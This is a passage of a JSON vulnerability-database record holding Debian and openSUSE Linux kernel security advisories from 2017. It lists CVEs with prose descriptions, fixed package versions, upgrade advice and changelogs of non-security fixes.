malicious unprivileged guest to\n obtain sensitive information from the host or other guests.\n\nCVE-2017-11176\n\n It was discovered that the mq_notify() function does not set the\n sock pointer to NULL upon entry into the retry logic. An attacker\n can take advantage of this flaw during a user-space close of a\n Netlink socket to cause a denial of service or potentially cause\n other impact.\n\nCVE-2017-1000365\n\n It was discovered that argument and environment pointers are not\n taken properly into account to the imposed size restrictions on\n arguments and environmental strings passed through\n RLIMIT_STACK/RLIMIT_INFINITY. A local attacker can take advantage of\n this flaw in conjunction with other flaws to execute arbitrary code.\n\nFor the oldstable distribution (jessie), these problems will be fixed in\na subsequent DSA.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.30-2+deb9u3.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 21, "modified": "2017-08-07T05:19:12", "published": "2017-08-07T05:19:12", "id": "DEBIAN:DSA-3927-1:A186E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00189.html", "title": "[SECURITY] [DSA 3927-1] linux security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-12T01:03:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-7889", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000363", "CVE-2017-7542", "CVE-2017-12154", "CVE-2017-11600", "CVE-2017-1000365"], "description": "Package : linux\nVersion : 3.2.93-1\nCVE ID : CVE-2017-7482 CVE-2017-7542 CVE-2017-7889 CVE-2017-10661 \n CVE-2017-10911 CVE-2017-11176 CVE-2017-11600 CVE-2017-12134 \n CVE-2017-12153 CVE-2017-12154 CVE-2017-14106 CVE-2017-14140 \n CVE-2017-14156 CVE-2017-14340 CVE-2017-14489 CVE-2017-1000111 \n CVE-2017-1000251 CVE-2017-1000363 CVE-2017-1000365\n\t\t CVE-2017-1000380\nDebian Bug : #866511 #875881\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7482\n\n Shi Lei discovered that RxRPC Kerberos 5 ticket handling code does\n not properly verify metadata, leading to information disclosure,\n denial of service or potentially execution of arbitrary code.\n\nCVE-2017-7542\n\n An integer overflow vulnerability in the ip6_find_1stfragopt()\n function was found allowing a local attacker with privileges to open\n raw sockets to cause a denial of service.\n\nCVE-2017-7889\n\n Tommi Rantala and Brad Spengler reported that the mm subsystem does\n not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\n allowing a local attacker with access to /dev/mem to obtain\n sensitive information or potentially execute arbitrary code.\n\nCVE-2017-10661\n\n Dmitry Vyukov of Google reported that the timerfd facility does\n not properly handle certain concurrent operations on a single file\n descriptor. This allows a local attacker to cause a denial of\n service or potentially to execute arbitrary code.\n\nCVE-2017-10911 / XSA-216\n\n Anthony Perard of Citrix discovered an information leak flaw in Xen\n blkif response handling, allowing a malicious unprivileged guest to\n obtain sensitive information from the host or other guests.\n\nCVE-2017-11176\n\n It was discovered that the mq_notify() function does not set the\n sock pointer to NULL upon entry into the retry logic. An attacker\n can take advantage of this flaw during a userspace close of a\n Netlink socket to cause a denial of service or potentially cause\n other impact.\n\nCVE-2017-11600\n\n bo Zhang reported that the xfrm subsystem does not properly\n validate one of the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability can use this to cause a denial\n of service or potentially to execute arbitrary code.\n\nCVE-2017-12134 / #866511 / XSA-229\n\n Jan H. Sch\u00f6nherr of Amazon discovered that when Linux is running\n in a Xen PV domain on an x86 system, it may incorrectly merge\n block I/O requests. A buggy or malicious guest may trigger this\n bug in dom0 or a PV driver domain, causing a denial of service or\n potentially execution of arbitrary code.\n\n This issue can be mitigated by disabling merges on the underlying\n back-end block devices, e.g.:\n echo 2 &gt; /sys/block/nvme0n1/queue/nomerges\n\nCVE-2017-12153\n\n bo Zhang reported that the cfg80211 (wifi) subsystem does not\n properly validate the parameters to a netlink message. Local users\n with the CAP_NET_ADMIN capability on a system with a wifi device\n can use this to cause a denial of service.\n\nCVE-2017-12154\n\n Jim Mattson of Google reported that the KVM implementation for\n Intel x86 processors did not correctly handle certain nested\n hypervisor configurations. A malicious guest (or nested guest in a\n suitable L1 hypervisor) could use this for denial of service.\n\nCVE-2017-14106\n\n Andrey Konovalov of Google reported that a specific sequence of\n operations on a TCP socket could lead to division by zero. A\n local user could use this for denial of service.\n\nCVE-2017-14140\n\n Otto Ebeling reported that the move_pages() system call permitted\n users to discover the memory layout of a set-UID process running\n under their real user-ID. This made it easier for local users to\n exploit vulnerabilities in programs installed with the set-UID\n permission bit set.\n\nCVE-2017-14156\n\n &quot;sohu0106&quot; reported an information leak in the atyfb video driver.\n A local user with access to a framebuffer device handled by this\n driver could use this to obtain sensitive information.\n\nCVE-2017-14340\n\n Richard Wareing discovered that the XFS implementation allows the\n creation of files with the &quot;realtime&quot; flag on a filesystem with no\n realtime device, which can result in a crash (oops). A local user\n with access to an XFS filesystem that does not have a realtime\n device can use this for denial of service.\n\nCVE-2017-14489\n\n ChunYu of Red Hat discovered that the iSCSI subsystem does not\n properly validate the length of a netlink message, leading to\n memory corruption. A local user with permission to manage iSCSI\n devices can use this for denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000111\n\n Andrey Konovalov of Google reported that a race condition in the\n raw packet (af_packet) feature. Local users with the CAP_NET_RAW\n capability can use this to cause a denial of service or possibly to\n execute arbitrary code.\n\nCVE-2017-1000251 / #875881\n\n Armis Labs discovered that the Bluetooth subsystem does not\n properly validate L2CAP configuration responses, leading to a\n stack buffer overflow. This is one of several vulnerabilities\n dubbed &quot;Blueborne&quot;. A nearby attacker can use this to cause a\n denial of service or possibly to execute arbitrary code on a\n system with Bluetooth enabled.\n\nCVE-2017-1000363\n\n Roee Hay reported that the lp driver does not properly bounds-check\n passed arguments. This has no security impact in Debian.\n\nCVE-2017-1000365\n\n It was discovered that argument and environment pointers are not\n properly taken into account by the size restrictions on arguments\n and environmental strings passed through execve(). A local\n attacker can take advantage of this flaw in conjunction with other\n flaws to execute arbitrary code.\n\nCVE-2017-1000380\n\n Alexander Potapenko of Google reported a race condition in the ALSA\n (sound) timer driver, leading to an information leak. A local user\n with permission to access sound devices could use this to obtain\n sensitive information.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n3.2.93-1. This version also includes bug fixes from upstream versions\nup to and including 3.2.93.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n3.16.43-2+deb8u4 or were fixed in an earlier version.\n\nFor Debian 9 &quot;Stretch&quot;, these problems have been fixed in version\n4.9.30-2+deb9u4 or were fixed in an earlier version.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams", "edition": 10, "modified": "2017-09-20T17:48:01", "published": "2017-09-20T17:48:01", "id": "DEBIAN:DLA-1099-1:57108", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00017.html", "title": "[SECURITY] [DLA 1099-1] linux security update", "type": "debian", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:51:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-11176", "CVE-2017-7889", "CVE-2017-7346", "CVE-2014-9940", "CVE-2017-7533", "CVE-2017-10911", "CVE-2017-7482", "CVE-2017-7541", "CVE-2017-1000363", "CVE-2017-7542", "CVE-2017-9605", "CVE-2017-1000365"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3945-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nAugust 17, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2014-9940 CVE-2017-7346 CVE-2017-7482 CVE-2017-7533\n CVE-2017-7541 CVE-2017-7542 CVE-2017-7889 CVE-2017-9605\n CVE-2017-10911 CVE-2017-11176 CVE-2017-1000363\n CVE-2017-1000365\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2014-9940\n\n A use-after-free flaw in the voltage and current regulator driver\n could allow a local user to cause a denial of service or potentially\n escalate privileges.\n\nCVE-2017-7346\n\n Li Qiang discovered that the DRM driver for VMware virtual GPUs does\n not properly check user-controlled values in the\n vmw_surface_define_ioctl() functions for upper limits. A local user\n can take advantage of this flaw to cause a denial of service.\n\nCVE-2017-7482\n\n Shi Lei discovered that RxRPC Kerberos 5 ticket handling code does\n not properly verify metadata, leading to information disclosure,\n denial of service or potentially execution of arbitrary code.\n\nCVE-2017-7533\n\n Fan Wu and Shixiong Zhao discovered a race condition between inotify\n events and VFS rename operations allowing an unprivileged local\n attacker to cause a denial of service or escalate privileges.\n\nCVE-2017-7541\n\n A buffer overflow flaw in the Broadcom IEEE802.11n PCIe SoftMAC WLAN\n driver could allow a local user to cause kernel memory corruption,\n leading to a denial of service or potentially privilege escalation.\n\nCVE-2017-7542\n\n An integer overflow vulnerability in the ip6_find_1stfragopt()\n function was found allowing a local attacker with privileges to open\n raw sockets to cause a denial of service.\n\nCVE-2017-7889\n\n Tommi Rantala and Brad Spengler reported that the mm subsystem does\n not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism,\n allowing a local attacker with access to /dev/mem to obtain\n sensitive information or potentially execute arbitrary code.\n\nCVE-2017-9605\n\n Murray McAllister discovered that the DRM driver for VMware virtual\n GPUs does not properly initialize memory, potentially allowing a\n local attacker to obtain sensitive information from uninitialized\n kernel memory via a crafted ioctl call.\n\nCVE-2017-10911 / XSA-216\n\n Anthony Perard of Citrix discovered an information leak flaw in Xen\n blkif response handling, allowing a malicious unprivileged guest to\n obtain sensitive information from the host or other guests.\n\nCVE-2017-11176\n\n It was discovered that the mq_notify() function does not set the\n sock pointer to NULL upon entry into the retry logic. An attacker\n can take advantage of this flaw during a userspace close of a\n Netlink socket to cause a denial of service or potentially cause\n other impact.\n\nCVE-2017-1000363\n\n Roee Hay reported that the lp driver does not properly bounds-check\n passed arguments, allowing a local attacker with write access to the\n kernel command line arguments to execute arbitrary code.\n\nCVE-2017-1000365\n\n It was discovered that argument and environment pointers are not\n taken properly into account to the imposed size restrictions on\n arguments and environmental strings passed through\n RLIMIT_STACK/RLIMIT_INFINITY. A local attacker can take advantage of\n this flaw in conjunction with other flaws to execute arbitrary code.\n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.43-2+deb8u3.\n\nWe recommend that you upgrade your linux packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 18, "modified": "2017-08-17T18:40:23", "published": "2017-08-17T18:40:23", "id": "DEBIAN:DSA-3945-1:532A6", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00207.html", "title": "[SECURITY] [DSA 3945-1] linux security update", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-17T18:10:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the &quot;CR8-load exiting&quot; and &quot;CR8-store\n exiting&quot; L0 vmcs02 controls exist in cases where L1 omits the &quot;use TPR\n shadow&quot; vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - efi/fb: Avoid reconfiguration of BAR that covers the framebuffer\n (bsc#1051987).\n - efi/fb: Correct PCI_STD_RESOURCE_END usage (bsc#1051987).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - iw_cxgb4: put ep reference in pass_accept_req() (fate#321658 bsc#1005778\n fate#321660 bsc#1005780 fate#321661 bsc#1005781).\n - KABI fix drivers/nvme/target/nvmet.h (bsc#1058550).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: Workaround kABI breakage of AMD-AVIC fixes (bsc#1044503).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: Add struct kvm_vcpu pointer parameter to get_enable_apicv()\n (bsc#1044503).\n - kvm: async_pf: Fix #DF due to inject &quot;Page not Present&quot; and &quot;Page Ready&quot;\n exceptions simultaneously (bsc#1061017).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: SVM: Add irqchip_split() checks before enabling AVIC (bsc#1044503).\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static array)\n (bsc#1059500).\n - kvm: SVM: Refactor AVIC vcpu initialization into avic_init_vcpu()\n (bsc#1044503).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: &lt;MAXA|MINA&gt;.&lt;D|S&gt;: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: &lt;MAXA|MINA&gt;.&lt;D|S&gt;: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: &lt;MAX|MAXA|MIN|MINA&gt;.&lt;D|S&gt;: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: &lt;MAX|MAXA|MIN|MINA&gt;.&lt;D|S&gt;: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: &lt;MAX|MIN&gt;.&lt;D|S&gt;: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.&lt;D|S&gt;: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nvme-fabrics: generate spec-compliant UUID NQNs (bsc#1057498).\n - nvmet: Move serial number from controller to subsystem (bsc#1058550).\n - nvmet: preserve controller serial number between reboots (bsc#1058550).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring Unit driver\n (bsc#1036737).\n - perf: xgene: Include module.h (bsc#1036737).\n - perf: xgene: Move PMU leaf functions into function pointer structure\n (bsc#1036737).\n - perf: xgene: Parse PMU subnode from the match table (bsc#1036737).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. PM_BRU_CMPL in Power9 event list\n (bsc#1056686, fate#321438, bsc#1047238, git-fixes 34922527a2bc).\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code from power8\n (fate#321438, bsc#1053043, git-fixes efe881afdd999).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - rdma/bnxt_re: Allocate multiple notification queues (bsc#1037579).\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback (bsc#1037579).\n - Revert &quot;net: fix percpu memory leaks&quot; (bnc#1012382).\n - Revert &quot;net: phy: Correctly process PHY_HALTED in phy_stop_machine()&quot;\n (bnc#1012382).\n - Revert &quot;net: use lib/percpu_counter API for fragmentation mem\n accounting&quot; (bnc#1012382).\n - Revert &quot;Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-processing.patch\n (bsc#1043598, bsc#1036215).&quot;\n - Revert &quot;xfs: detect and handle invalid iclog size set by mkfs\n (bsc#1043598).&quot;\n - Revert &quot;xfs: detect and trim torn writes during log recovery\n (bsc#1036215).&quot;\n - Revert &quot;xfs: refactor and open code log record crc check (bsc#1036215).&quot;\n - Revert &quot;xfs: refactor log record start detection into a new helper\n (bsc#1036215).&quot;\n - Revert &quot;xfs: return start block of first bad log record during recovery\n (bsc#1036215).&quot;\n - Revert &quot;xfs: support a crc verification only log record pass\n (bsc#1036215).&quot;\n - scsi: ILLEGAL REQUEST + ASC==27 =&amp;gt; target failure (bsc#1059465).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi_transport_fc: Also check for NOTPRESENT in fc_remote_port_add()\n (bsc#1037890).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of &quot;new&quot; 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - Update patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-check.patch\n (bsc#1036737).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function (bsc#1060229).\n - x86/cpu/amd: Limit cpu_core_id fixup to families older than F17h\n (bsc#1060229).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/mm: Fix boot crash caused by incorrect loop count calculation in\n sync_global_pgds() (bsc#1058512).\n - x86/mm: Fix fault error path using unsafe vma pointer (fate#321300).\n\n", "edition": 1, "modified": "2017-10-17T15:15:08", "published": "2017-10-17T15:15:08", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00019.html", "id": "OPENSUSE-SU-2017:2741-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-17T18:10:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the &quot;CR8-load exiting&quot; and &quot;CR8-store\n exiting&quot; L0 vmcs02 controls exist in cases where L1 omits the &quot;use TPR\n shadow&quot; vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: Add commit b5accbb0dfae\n - blacklist.conf: add one more\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - 